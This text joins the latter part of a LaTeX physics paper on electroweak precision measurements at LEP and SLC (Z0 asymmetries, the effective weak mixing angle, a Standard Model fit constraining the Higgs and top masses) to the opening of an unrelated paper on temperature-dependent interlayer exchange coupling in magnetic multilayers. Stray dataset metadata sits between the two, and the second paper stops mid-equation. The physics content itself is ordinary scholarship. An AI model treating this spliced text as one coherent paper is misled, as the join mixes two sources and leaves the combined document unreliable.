\frac{2 \biggl( \frac{g^f_V}{g^f_A} \biggr) }{1 + \biggl( \frac{g^f_V}{g^f_A}\biggr)^2},
\end{eqnarray}
\noindent where $g^f_{V(A)}$ denotes the vector(axial-vector) coupling constants, one can write
all the $\mathrm{Z}^{0}$~asymmetries in terms of $A_{\mathrm{f}}$.
Each process $e^+ e^- \rightarrow \mathrm{Z}^{0} \rightarrow \mathrm{f}\bar{\mathrm{f}}$
can be characterised
by the direction and the helicity of the emitted fermion (f). Calling forward the hemisphere
into which the electron beam is pointing, the events can be subdivided into four categories:
FR,BR,FL and BL, corresponding to right-handed (R) or left-handed (L) fermions emitted
in the forward (F) or backward (B) direction. Then, one can write three $\mathrm{Z}^{0}$~asymmetries
as:
\noindent
\begin{eqnarray}
A_{\mathrm{pol}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}-\sigma_{\mathrm{FL}}-\sigma_{\mathrm{BL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = -A_{\mathrm{f}} \\
A^{\mathrm{FB}}_{\mathrm{pol}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BL}}-\sigma_{\mathrm{BR}}-\sigma_{\mathrm{FL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = -\frac{3}{4} A_{\mathrm{e}} \\
A_{\mathrm{FB}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{FL}}-\sigma_{\mathrm{BR}}-\sigma_{\mathrm{BL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = \frac{3}{4} A_{\mathrm{e}}A_{\mathrm{f}}
\end{eqnarray}
\noindent and in case the initial state is polarised with some degree of polarisation
($P$), one can define:
\noindent
\begin{eqnarray}
A_{\mathrm{LR}} \equiv & \frac{1}{P}
\frac{\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}-\sigma_{\mathrm{Fr}}-\sigma_{\mathrm{Br}}}
{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Br}}+\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}}
& = A_{\mathrm{e}} \\
A^{\mathrm{pol}}_{\mathrm{FB}} \equiv & -\frac{1}{P}
\frac{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Bl}}-\sigma_{\mathrm{Fl}}-\sigma_{\mathrm{Br}}}
{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Br}}+\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}}
& = \frac{3}{4} A_{\mathrm{f}}
\end{eqnarray}
\noindent where r(l) denotes the right(left)-handed initial state polarisation. Assuming lepton
universality, all this observables depend only on the ratio between the vector and axial-vector
couplings. It is conventional to define the effective mixing angle $\sin^2\theta_{\mathrm{eff}}$~as
\noindent
\begin{eqnarray}
\sin^2\theta_{\mathrm{eff}} & \equiv & \frac{1}{4} \biggl( 1 - \frac{g^l_V}{g^l_A} \biggr)
\end{eqnarray}
\noindent and to collapse all the asymmetries into a single parameter $\sin^2\theta_{\mathrm{eff}}$.
\subsection{\bf Lepton asymmetries}\label{subsec:lepton_asym}
\subsubsection{\bf Angular distribution}\label{subsec:lepton_afb}
The lepton forward-backward asymmetry is measured from the angular distribution
of the final state lepton.
The measurement of $A^{\mathrm{l}}_{FB}$ is quite simple and robust and its
accuracy is limited by the statistical error. The common systematic uncertainty in the LEP measurement
due to the uncertainty on the LEP energy measurement is about~0.0007.
The values measured by the LEP collaborations are in agreement with lepton universality,
\noindent
\begin{eqnarray}
& A^e_{\mathrm{FB}} = 0.0153 \pm 0.0025 & \nonumber \\
& A^{\mu}_{\mathrm{FB}} = 0.0164 \pm 0.0013 & \nonumber \\
& A^{\tau}_{\mathrm{FB}}= 0.0183 \pm 0.0017 & \nonumber
\end{eqnarray}
\noindent and can be combined into a single measurement of $\sin^2\theta_{\mathrm{eff}}$,
\noindent
\begin{eqnarray}
A^{\mathrm{l}}_{\mathrm{FB}}= 0.01683 \pm 0.00096 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23117 \pm 0.00054}. \nonumber
\end{eqnarray}
\subsubsection{\bf Tau polarisation at LEP}\label{subsec:lepton_taupol}
Tau leptons decaying inside the apparatus acceptance can be used to measure
the polarised asymmetries defined by equations~(4) and~(5). A more sensitive method
is to fit the measured dependence of $A_{\mathrm{pol}}$ as a function of the
polar angle $\theta$ :
\noindent
\begin{eqnarray}
A_{\mathrm{pol}}(\cos\theta) & = &
- \frac{A_{\tau}(1+\cos^2\theta)+2 A_e \cos\theta}{(1+\cos^2\theta) + 2 A_{\tau} A_e \cos\theta }
\end{eqnarray}
The sensitivity of this measurement to $\sin^2\theta_{\mathrm{eff}}$~is larger because the dependence
on $A_{\mathrm{l}}$ is linear to a good approximation.
The accuracy of the measurements is dominated by the statistical
error. The typical systematic error is about 0.003 for $A_{\tau}$ and 0.001 for $A_e$.
The LEP measurements are:
\noindent
\begin{eqnarray}
A_{e} = 0.1479 \pm 0.0051 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23141 \pm 0.00065} \nonumber \\
A_{\tau}= 0.1431 \pm 0.0045 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23202 \pm 0.00057} \nonumber
\end{eqnarray}
\subsection{\bf $\mathrm{A}_{\mathrm{LR}}$~from SLD}\label{subsec:alr}
The linear accelerator at SLAC (SLC) allows to collide positrons
with a highly longitudinally polarised electron beam (up to 77\% polarisation). Therefore,
the SLD detector can measure the left-right cross-section asymmetry ($\mathrm{A}_{\mathrm{LR}}$)
defined by equation~(7). This observable is a factor of 4.6 times more sensitive to
$\sin^2\theta_{\mathrm{eff}}$~than, for instance, $A^{\mathrm{l}}_{\mathrm{FB}}$ for a given precision.
The measurement is potentially free of experimental
systematic errors, with the exception of the polarisation measurement that
has been carefully cross-checked at the 1\% level. The last update on this
measurement gives
\noindent
\begin{eqnarray}
A_{\mathrm{LR}} = 0.1510 \pm 0.0025 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23101 \pm 0.00031}, \nonumber
\end{eqnarray}
\noindent and assuming lepton universality it can be
combined with preliminary measurements at SLD of the lepton
left-right forward-backward asymmetry ($A^{\mathrm{pol}}_{\mathrm{FB}}$)
defined in equation~(8) to give
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.23109 \pm 0.00029}. & \nonumber
\end{eqnarray}
\subsection{\bf Lepton couplings}\label{subsec:lepton_coup}
All the previous measurements of the lepton coupling ($A_{\mathrm{l}}$) can be
combined with a $\chi^2/\mathrm{dof}=2.2/3$ and give
\noindent
\begin{eqnarray}
A_{\mathrm{l}} = 0.1489 \pm 0.0017 & \Longrightarrow &
{\sin^2\theta_{\mathrm{eff}} = 0.23128 \pm 0.00022}. \nonumber
\end{eqnarray}
The asymmetries measured are only sensitive to the ratio between the
vector and axial-vector couplings. If we introduce also the measurement
of the leptonic width shown in table~\ref{tab:lineshape} we can
fit the lepton couplings to the $\mathrm{Z}^{0}$~to be
\noindent
\begin{eqnarray}
g^l_V & = & -0.03753 \pm 0.00044, \nonumber \\
g^l_A & = & -0.50102 \pm 0.00030, \nonumber
\end{eqnarray}
\noindent where the sign is chosen to be negative by definition.
Figure~\ref{fig:gvga} shows the 68~\% probability contours in the
$g^l_V - g^l_A$ plane.
\begin{figure}
\centering
\mbox{%
\epsfig{file=gvga.eps
,height=8cm
,width=10cm
}%
}
\caption{Contours of 68\% probability in the $g^l_V - g^l_A$ plane. The solid
contour results from a fit assuming lepton universality. Also shown is the one
standard deviation band resulting from the $\mathrm{A}_{\mathrm{LR}}$~measurement of SLD.}
\label{fig:gvga}
\end{figure}
\subsection{\bf Quark asymmetries}\label{subsec:quark_asym}
\subsubsection{\bf Heavy Flavour asymmetries}\label{subsec:HF_asym}
The inclusive measurement of the $b$ and $c$ asymmetries is more sensitive
to $\sin^2\theta_{\mathrm{eff}}$~than, for instance, the leptonic forward-backward asymmetry. The
reason is that $A_b$ and $A_c$ are mostly independent of $\sin^2\theta_{\mathrm{eff}}$, therefore
$A^{b(c)}_{\mathrm{FB}}$ (which is proportional to the product $A_e A_{b(c)}$)
is a factor 3.3(2.4) more sensitive than $A^{\mathrm{l}}_{\mathrm{FB}}$.
The typical systematic uncertainty in $A^{b(c)}_{\mathrm{FB}}$ is
about 0.001(0.002) and the precision of the measurement is
dominated by statistics.
SLD can measure also the $b$ and $c$
left-right forward-backward asymmetry defined in equation~(8) which is
a direct measurement of the quark coupling $A_b$ and $A_c$.
The combined fit for the LEP and SLD measurements gives
\noindent
\begin{eqnarray}
A^b_{\mathrm{FB}}= 0.0990 \pm 0.0021 & \Longrightarrow & {\sin^2\theta_{\mathrm{eff}} = 0.23225 \pm 0.00038}
\nonumber \\
A^c_{\mathrm{FB}}= 0.0709 \pm 0.0044 & \Longrightarrow & {\sin^2\theta_{\mathrm{eff}} = 0.2322 \pm 0.0010}
\nonumber \\
A_b = 0.867 \pm 0.035 & & \nonumber \\
A_c = 0.647 \pm 0.040 & & \nonumber
\end{eqnarray}
\noindent where 13\% is the largest correlation between $A^b_{\mathrm{FB}}$ and $A^c_{\mathrm{FB}}$.
Taking the value of $A_{\mathrm{l}}$ given in section~\ref{subsec:lepton_coup} and these
measurements together in a combined fit gives
\noindent
\begin{eqnarray}
& A_b = 0.881 \pm 0.018 & \nonumber \\
& A_c = 0.641 \pm 0.028 & \nonumber
\end{eqnarray}
\noindent to be compared with the MSM predictions $A_b = 0.935$ and
$A_c = 0.668$ valid over a wide
range of the input parameters.
The measurement of $A_c$ is in good agreement with expectations,
while the measurement of $A_b$ is 3 standard deviations lower than
the predicted value.
This is due to three independent measurements: the SLD measurement of
$A_b$ is low compared with the MSM, while the LEP measurement of
$A^b_{\mathrm{FB}}$ is low and the SLD measurement of
$A_{\mathrm{LR}}$ is high compared with the results of the best fit to
the MSM predictions (see section~\ref{subsec:fit}).
\subsubsection{\bf Jet charge asymmetries}\label{subsec:jet_asym}
The average charge flow in the inclusive samples of hadronic $\mathrm{Z}^{0}$~decays
is related to the forward-backward asymmetries of individual quarks:
\noindent
\begin{eqnarray}
\langle \mathrm{Q}_{\mathrm{FB}} \rangle & = & \sum_{\mathrm{q}}
\delta_{\mathrm{q}} A^{\mathrm{q}}_{\mathrm{FB}} \frac{\Gamma_{\mathrm{q\bar{q}}}}{\Gamma_{\mathrm{h}}}
\end{eqnarray}
\noindent where $\delta_{\mathrm{q}}$, the charge separation, is the average charge
difference between the quark and antiquark hemispheres in an event.
The combined LEP value is
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.2321 \pm 0.0010}. & \nonumber
\end{eqnarray}
\subsubsection{\bf Comparison of the determinations of
$\boldmath{\sin^2\theta_{\mathrm{eff}}}$}\label{subsec:sineff}
The combination of all the quark asymmetries shown in this section can be
directly compared to the determination of $\sin^2\theta_{\mathrm{eff}}$~obtained with leptons,
\noindent
\begin{eqnarray}
{\sin^2\theta_{\mathrm{eff}} = 0.23222 \pm 0.00033} & & \mathrm{(quark-asymmetries)} \nonumber \\
{\sin^2\theta_{\mathrm{eff}} = 0.23128 \pm 0.00022} & & \mathrm{(lepton-asymmetries)} \nonumber
\end{eqnarray}
\noindent which shows a 2.4~$\sigma$ discrepancy.
Over all, the agreement is very good, and the combination of the individual
determinations of $\sin^2\theta_{\mathrm{eff}}$~gives
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.23157 \pm 0.00018} & \nonumber
\end{eqnarray}
\noindent with a $\chi^2/\mathrm{dof}=7.8/6$ as it is shown
in figure~\ref{fig:sef}.
\begin{figure}
\centering
\mbox{%
\epsfig{file=sweff.eps
,height=7cm
,width=8cm
}%
}
\caption{Comparison of several determinations of $\sin^2\theta_{\mathrm{eff}}$~from asymmetries.}
\label{fig:sef}
\end{figure}
\section{Consistency with the Minimal Standard Model}\label{sec:consistency}
The MSM predictions are computed using the programs TOPAZ0~\cite{TOPAZ0}
and ZFITTER~\cite{ZFITTER}. They represent the state-of-the-art in the
computation of radiative corrections, and incorporate recent calculations such as
the QED radiator function to \cal{O}($\alpha^3$)~\cite{ALPHA3}, four-loop
QCD effects~\cite{QCD4LOOP}, non-factorisable QCD-EW corrections~\cite{QCDEW},
and two-loop sub-leading
\cal{O}($\alpha^2 \mathrm{m}^2_{\mathrm{t}} / \mathrm{M}^2_{\mathrm{Z}}$)
corrections~\cite{DEGRASSI}, resulting in a significantly reduced theoretical
uncertainty compared to the work summarized in reference~\cite{YR95}.
\subsection{\bf Are we sensitive to radiative corrections other than $\Delta\alpha$?}\label{subsec:sensitivity}
This is the most natural question to ask if one pretends to test the MSM as
a Quantum Field Theory and
to extract information on the only unknown parameter in the MSM, $\mathrm{M}_{\mathrm{H}}$.
The MSM prediction of $\mathrm{R}_{\mathrm{b}}$~neglecting radiative corrections is ${\mathrm{R}}^0_{\mathrm{b}}=0.2183$,
while the measured value given in section~\ref{subsec:HF} is about $2.3\sigma$ lower.
From table~\ref{tab:sensitiv} one can see that the MSM prediction depends only
on $\mathrm{m}_{\mathrm{t}}$~and allows to determine indirectly its mass to be $\mathrm{m}_{\mathrm{t}}$=151$\pm$25~GeV,
in agreement with the direct measurement ($\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV).
From the measurement of the leptonic width, the vector-axial coupling given in
section~\ref{subsec:lepton_coup} disagrees with the Born prediction (-1/2) by about
$3.4\sigma$, showing evidence for radiative corrections in the
$\rho$ parameter, $\Delta\rho = 0.0041 \pm 0.0012$.
However, the most striking evidence for pure weak radiative corrections is not coming
from $\mathrm{Z}^{0}$~physics, but from $\mathrm{M}_{\mathrm{W}}$~and its relation with $G_{\mu}$. The value measured
at LEP and TEVATRON~\cite{LANCON} is $\mathrm{M}_{\mathrm{W}}$=$80.39 \pm 0.06$~GeV. From this measurement
and through the relation
\noindent
\begin{eqnarray}
\mathrm{M}^2_{\mathrm{W}} \left(1 - \frac{\mathrm{M}^2_{\mathrm{W}}}{\mathrm{M}^2_{\mathrm{Z}}} \right) &
= & \frac{\pi \alpha}{G_{\mu} \sqrt{2}} \left( 1 + \Delta r\right)
\end{eqnarray}
\noindent one gets a measurement of $\Delta r = 0.036 \pm 0.004$, and subtracting the
value of $\Delta\alpha$ ($\Delta\alpha = -\Pi_{\gamma\gamma}$),
given in section~\ref{subsec:input_par},
one obtains $\Delta r_{\mathrm{W}} = \Delta r - \Delta \alpha = -0.027 \pm 0.004$,
which is about $6.8\sigma$ different from zero. A more detailed investigation
on the evidence for pure weak radiative corrections can be found in reference~\cite{SIRLIN}.
\subsection{\bf Fit to the MSM predictions}\label{subsec:fit}
Having shown that there is sensitivity to pure weak corrections with the accuracy in the
measurements achieved so far, one can envisage to fit the values of the unknown Higgs mass and
the less well known top mass in the context of the MSM predictions. The fit
is done using not only the $\mathrm{Z}^{0}$~measurements shown in this letter but also using
the W mass measurements~\cite{LANCON} and $\nu$N scattering measurements~\cite{NUTEV}.
The quality of the fit is very good, ($\chi^2/\mathrm{dof}=13.3/14$) and
the result is,
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} & = & 161.1^{+8.2}_{-7.1}~\mathrm{GeV} \nonumber
\end{eqnarray}
\noindent to be compared with $\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV measured at TEVATRON. The result
of the fit is shown in the $\mathrm{M}_{\mathrm{H}}$-$\mathrm{m}_{\mathrm{t}}$~plane in figure~\ref{fig:mhmt}. Both
determinations of $\mathrm{m}_{\mathrm{t}}$~have similar precision and are compatible ($1.4\sigma$). Therefore,
one can constrain the previous fit with the direct measurement of $\mathrm{m}_{\mathrm{t}}$~and obtains:
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} = & 171.1 \pm 4.9~\mathrm{GeV} & \nonumber \\
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber \\
\alpha_s = & 0.119 \pm 0.003 & \nonumber
\end{eqnarray}
\noindent with a very reasonable $\chi^2/\mathrm{dof}=14.9/15$. The agreement
of the fit with the measurements is impressive and it is shown as a pull distribution in
figure~\ref{fig:pulls}.
The best indirect determination of the W mass is obtained from
the MSM fit when no information from the direct measurement is used,
\noindent
\begin{eqnarray}
\mathrm{M}_{\mathrm{W}} & = & 80.367 \pm 0.029~\mathrm{GeV}. \nonumber
\end{eqnarray}
The most significant correlation on the fitted parameters is 77\% between
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ and $\alpha(\mathrm{M}^2_{\mathrm{Z}})$.
If one of the more precise new evaluations of $\Delta\alpha$ mentioned in
section~\ref{subsec:input_par} is used, this correlation decreases dramatically
and the precision on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ improves by about 30\%.
For instance, using $\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) = 128.923 \pm 0.036$
from reference~\cite{DAVIER}, one gets:
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} = & 171.4 \pm 4.8~\mathrm{GeV} & \nonumber \\
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.96^{+0.23}_{-0.26} &
(\mathrm{M}_{\mathrm{H}} = 91^{+64}_{-41}~\mathrm{GeV}) \nonumber \\
\alpha_s = & 0.119 \pm 0.003 & \nonumber
\end{eqnarray}
\noindent with the same confidence level ($\chi^2/\mathrm{dof}=14.9/15$) and
a correlation of 39\% between
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ and $\alpha(\mathrm{M}^2_{\mathrm{Z}})$.
\begin{figure}
\centering
\mbox{%
\epsfig{file=mhmt.eps
,height=7cm
,width=9cm
}%
}
\caption{The 68\% and 95\% confidence level contours in the $\mathrm{m}_{\mathrm{t}}$~vs~$\mathrm{M}_{\mathrm{H}}$~plane. The
vertical band shows the 95\% C.L. exclusion limit on $\mathrm{M}_{\mathrm{H}}$~from direct searches.}
\label{fig:mhmt}
\end{figure}
\begin{figure}
\centering
\mbox{%
\epsfig{file=pulls.eps
,height=7cm
,width=9cm
}%
}
\caption{Pulls of the measurements with respect to the best fit results. The
pull is defined as the difference of the measurement to the fit prediction divided
by the measurement error.}
\label{fig:pulls}
\end{figure}
\section{Constraints on $\mathrm{M}_{\mathrm{H}}$}
In the previous section it has been shown that the global MSM fit to the data
gives
\noindent
\begin{eqnarray}
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber
\end{eqnarray}
\noindent and taking into account the theoretical uncertainties (about $\pm$0.05 in
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$), this implies a one-sided 95\%~C.L. limit of:
\noindent
\begin{eqnarray}
\mathrm{M}_{\mathrm{H}} & < & 262~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.} \nonumber
\end{eqnarray}
\noindent which does not take into account the limits from direct searches
($\mathrm{M}_{\mathrm{H}} > 89.8~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.}$).
\subsection{\bf Is this low value of $\mathrm{M}_{\mathrm{H}}$~a consequence of a particular measurement?}\label{subsec:consistency}
As described in section~\ref{subsec:what_meas}, one can divide the measurements sensitive
to the Higgs mass into three different groups: Asymmetries, Widths and the W mass. They test
conceptually different components of the radiative corrections and it is interesting to
check the internal consistency.
Repeating the MSM fit shown in the previous section for the three different groups of measurements
with the additional constraint from~\cite{ALPHAS} $\alpha_s = 0.119 \pm 0.002$ gives the results shown in
the second column in
table~\ref{tab:consistency}. All the fits are consistent with a low value of the Higgs mass,
and there is no particular set of measurements that pulls $\mathrm{M}_{\mathrm{H}}$~down. This is seen with even more
detail in figure~\ref{fig:logmh}, where the individual determinations of
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ are shown for each measurement.
\begin{table}[t]
\caption{ Results on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ for different samples of
measurements. In the fit the input parameters and their uncertainties are taken to
be the values presented in section~\ref{subsec:input_par}. The impact of the uncertainty in each
parameter is explicitely shown. \label{tab:consistency}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c c c c c c c c c|}
\hline
{} &\raisebox{0pt}[13pt][7pt]{$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$} &
\raisebox{0pt}[13pt][7pt]{$[\Delta\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})]^2$} & = &
\raisebox{0pt}[13pt][7pt]{$[\Delta_{\mathrm{exp.}}]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\mathrm{m}_{\mathrm{t}}]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\alpha]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\alpha_s]^2$} \\
\hline
$\mathrm{Z}^{0}$~Asymmetries & $1.94^{+0.29}_{-0.31}$ &
$[0.29]^2$ & = & $[0.19]^2$ & + & $[0.12]^2$ & + & $[0.19]^2$ & + & $[0.01]^2$ \\
$\mathrm{Z}^{0}$~Widths & $2.21^{+0.36}_{-1.43}$ &
$[0.36]^2$ & = & $[0.31]^2$ & + & $[0.14]^2$ & + & $[0.08]^2$ & + & $[0.13]^2$ \\
$\mathrm{M}_{\mathrm{W}}$~and~$\nu\mathrm{N}$ & $2.04^{+0.45}_{-0.84}$ &
$[0.45]^2$ & = & $[0.41]^2$ & + & $[0.18]^2$ & + & $[0.08]^2$ & + & $[0.00]^2$ \\
\hline
\end{tabular}
\end{center}
\end{table}
\begin{figure}
\centering
\mbox{%
\epsfig{file=logmh.eps
,height=7cm
,width=9cm
}%
}
\caption{Individual determination of $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ for each
of the measurements.}
\label{fig:logmh}
\end{figure}
\begin{figure}
\centering
\mbox{%
\epsfig{file=chi2mh.eps
,height=7cm
,width=8cm
}%
}
\caption{ $\Delta\chi^2 = \chi^2 - \chi^2_{\mathrm{min}}$ vs. $\mathrm{M}_{\mathrm{H}}$~curve. Different
cases are considered: the present situation, the future situation when
$\Delta$$\mathrm{M}_{\mathrm{W}}$~is measured with a precision of 30~MeV and
when $\Delta\alpha^{-1}=0.02$ and $\Delta$$\mathrm{m}_{\mathrm{t}}$=2~GeV.
The band shows the limit from direct searches, and the discontinous line the
expected limit at the end of LEP2.}
\label{fig:chi2mh}
\end{figure}
\subsection{\bf Is there any chance to improve these constraints?}\label{subsec:future}
Although the most precise determination
of the Higgs mass is still coming from the $\mathrm{Z}^{0}$~asymmetries, it is clear
from table~\ref{tab:consistency} that any
future improvement will be limited by the uncertainty in
$\alpha(\mathrm{M}^2_{\mathrm{Z}})$. If
$\Delta\alpha^{-1} \sim 0.02$, then the error on
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ is reduced to about 0.23
($[\Delta_{\mathrm{exp.}}] \oplus [\Delta\mathrm{m}_{\mathrm{t}}]$), coming
only from the $\mathrm{Z}^{0}$~asymmetries measurements.
The accuracy of the W-boson mass is going to improve by a significant
factor in the near future. However, even if the W mass is measured with a
precision of 30~MeV, the error on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$
is going to be dominated by $\Delta\mathrm{m}_{\mathrm{t}}$ and will
not be better than 0.23 obtained with the $\mathrm{Z}^{0}$~asymmetries only,
both determinations being highly correlated by the uncertainty on
the top mass.
Therefore, the error on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$~is not going to
improve significantly until a precise measurement of the top mass (2~GeV)
becomes available. In such a case, one can easily obtain a precision
in $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ close to 0.15. This is what is shown
in figure~\ref{fig:chi2mh}.
Also shown in figure~\ref{fig:chi2mh} is the
expected direct search limit from LEP2. If the tendency to prefer a very
low value of $\mathrm{M}_{\mathrm{H}}$~continues with the new or updated measurements, and the accuracy
on the top mass and W-boson mass are improved significantly, consistent with the indirect
determinations, we may be able to constrain severely the value of $\mathrm{M}_{\mathrm{H}}$.
\section{Conclusions and outlook}
The measurements performed at LEP and SLC have substantially improved
the precision of the tests of the MSM, at the level of \cal{O}(0.1\%).
The effects of pure weak corrections are visible with a significance
larger than three standard deviations from $\mathrm{Z}^{0}$~observables and about
seven standard deviations from the W-boson mass.
The top mass predicted by the MSM fits, ($\mathrm{m}_{\mathrm{t}}$=$161.1^{+8.2}_{-7.1}$~GeV) is
compatible (about $1.4\sigma$) with the direct measurement
($\mathrm{m}_{\mathrm{t}}$=$173.8 \pm 5.0$~GeV) and of similar precision.
The W-boson mass predicted by the MSM fits, ($\mathrm{M}_{\mathrm{W}}=80.367\pm0.029~\mathrm{GeV}$)
is in very good agreement with the direct measurement
($\mathrm{M}_{\mathrm{W}}=80.39\pm0.06~\mathrm{GeV}$).
The mass of the Higgs boson is predicted to be low,
\noindent
\begin{eqnarray}
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber \\
\mathrm{M}_{\mathrm{H}} & < & 262~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.} \nonumber
\end{eqnarray}
\noindent This uncertainty is reduced to $\Delta(\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})) \sim 0.23$ when
the uncertainty from
$\Delta\alpha$ is negligible, and will be further reduced to
$\Delta(\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})) \sim 0.15$ when $\mathrm{m}_{\mathrm{t}}$~is known with a 2~GeV precision
and $\mathrm{M}_{\mathrm{W}}$~is known with a 30~MeV precision.
\section*{Acknowledgments}
I would like to thank Prof. Joan Sol\`{a} and all the organizing committee for the
excellent organization of the workshop.
I'm very grateful to Martin W. Gr$\ddot{\mathrm{u}}$newald and Gunter Quast for his help
in the preparation of the numbers and plots shown in this paper. I also thank
Guenther Dissertori for reading the paper and giving constructive criticisms.
\section*{References}
| 2024-02-18T23:40:13.932Z | 1998-11-20T10:05:01.000Z | algebraic_stack_train_0000 | 1,751 | 6,410 |
|
proofpile-arXiv_065-8582 | \section{INTRODUCTION}
The oscillatory interlayer exchange coupling (IEC) between magnetic
layers separated by a non-magnetic spacer has recently attracted
considerable attention in the literature.
The physical origin of such oscillations is attributed to quantum
interferences due to spin-dependent confinement of electrons in the
spacer.
The periods of the oscillations with respect to the
spacer thickness are determined by the spacer Fermi surface, and this
conclusion has been confirmed by numerous experiments.
In particular, the change of the Fermi surface by alloying
thus leads to the change of the oscillatory periods ({\it van Schilfgaarde
et al.}, 1995; {\it Kudrnovsk\'y et al.}, 1996).
On the other hand, there are very few studies of the temperature-dependence
of the IEC ({\it Bruno}, 1995; {\it d'Albuquerque~e~Castro et al.}, 1996),
and its systematic study on {\it ab initio} level is missing.
The main mechanism of the temperature dependence of the IEC is connected
with thermal excitations of electron-hole pairs across the Fermi level
as described by the Fermi-Dirac function.
It turns out that other mechanisms (e.g. electron-phonon or electron-magnon
interactions) are less important.
The effect of the temperature on the IEC can be evaluated either
analytically or numerically.
The analytical approach assumes the limit of large spacer thicknesses,
for which all the oscillatory contributions to the energy
integral cancel out with exception of those at the Fermi energy.
The energy integral is then evaluated by a standard saddle-point method
({\it Bruno}, 1995).
The general functional form of the temperature-dependence of the interlayer
exchange coupling ${\cal E}_x(T)$ in the limit of a single period is then:
\begin{equation} \label{eq_model}
{\cal E}_x(T) = {\cal E}_x(0) \, t(N,T) \, , \;\;\;\;
t(N,T)=\frac{cNT}{\sinh(cNT)} \, .
\end{equation}
Here, $T$ denotes the temperature, $N$ is the spacer thickness in monolayers,
and $c$ is the constant which depends on the spacer Fermi surface.
The term ${\cal E}_x(0)$ exhibits a standard $N^{-2}$-dependence
({\it Bruno}, 1995),
while the scaling temperature factor $t(N,T)$ depends on $N$ via $NT$.
In the preasymptotic regime (small spacer thicknesses) the functional form
of $t(N,T)$ differs from that of Eq.~(\ref{eq_model}), particularly in the
case of the complete but relatively weak confinement due to the rapid
variation of the phase of the integrand which enters the evaluation of the
IEC ({\it d'Albuquerque e Castro et al.}, 1996).
The second, numerical approach is in principle exact, not limited to large
spacer thicknesses, however, it may be numerically very demanding, in
particular for low temperatures.
It is applicable also to disordered systems with randomness in
the spacer, magnetic layers, or at interfaces ({\it Bruno et al.}, 1996).
\section{FORMALISM}
The multilayer system consists of the left and right magnetic subspaces
separated by a non-magnetic spacer (the trilayer).
The spacer may be a random substitutional alloy.
We employ the Lloyd formulation of the IEC combined with a
spin-polarized surface Green function technique as based
on the tight-binding linear muffin-tin orbital (TB-LMTO) method.
The exchange coupling energy ${\cal E}_x(T)$ can be written as
\begin{eqnarray} \label{eq_IEC}
{\cal E}_x(T) &=& {\rm Im} \, I(T) \, , \quad
I(T) = \int_{C} f(T,z) \, \Psi(z) \, d z \, ,
\end{eqnarray}
where $f(T,z)$ is the Fermi-Dirac distribution function and
\begin{eqnarray} \label{eq_psi}
\Psi(z) &=& \frac{1}{\pi N_{\|}} \, \sum_{{\bf k}_{\|}} \,
